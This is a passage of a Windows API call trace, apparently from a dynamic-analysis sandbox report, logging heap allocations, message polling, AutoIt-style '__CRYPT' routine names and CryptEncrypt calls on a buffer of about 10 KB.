lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0038.384] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.385] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.388] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.388] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.388] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.388] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0038.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.389] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.389] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.389] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.389] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.389] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.389] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.391] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x28f2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x2900) returned 1 [0038.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.391] CharLowerBuffW (in: lpsz="byte[10497]", cchLength=0xb | out: lpsz="byte[10497]") returned 0xb [0038.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.392] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.392] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac7b18*, pdwDataLen=0x6ae220*=0x28f2, dwBufLen=0x2900 | out: pbData=0xac7b18*, pdwDataLen=0x6ae220*=0x2900) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.393] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.393] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.393] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.393] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.394] PeekMessageW (in: lpMsg=0x6ae83c, 